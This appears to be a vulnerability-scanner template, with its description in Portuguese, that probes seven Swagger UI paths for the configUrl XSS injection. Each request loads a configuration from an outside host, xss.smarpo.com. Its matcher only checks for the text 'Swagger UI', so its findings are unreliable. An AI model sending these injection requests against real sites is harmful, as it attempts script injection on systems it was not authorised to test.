id: xss-injection-swagger

info:
  name: Verificação de Injeção de XSS em URLs do Swagger
  author: [erickfernandox]
  severity: high
  description: |
    Este template verifica se as URLs do Swagger estão vulneráveis a injeção de código XSS, explorando possíveis vulnerabilidades em diversas rotas.
  tags: 
    - xss
    - injection
    - swagger

requests:
  - method: GET
    path:
      - "{{BaseURL}}/swagger/index.html?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/swagger-ui/index.html?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/api/docs?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/api-doc?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/api/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json"
      - "{{BaseURL}}/swagger/ui/index.html?configUrl=https://xss.smarpo.com/test.json"      
      
    matchers:
      - type: word
        words:
          - "Swagger UI"
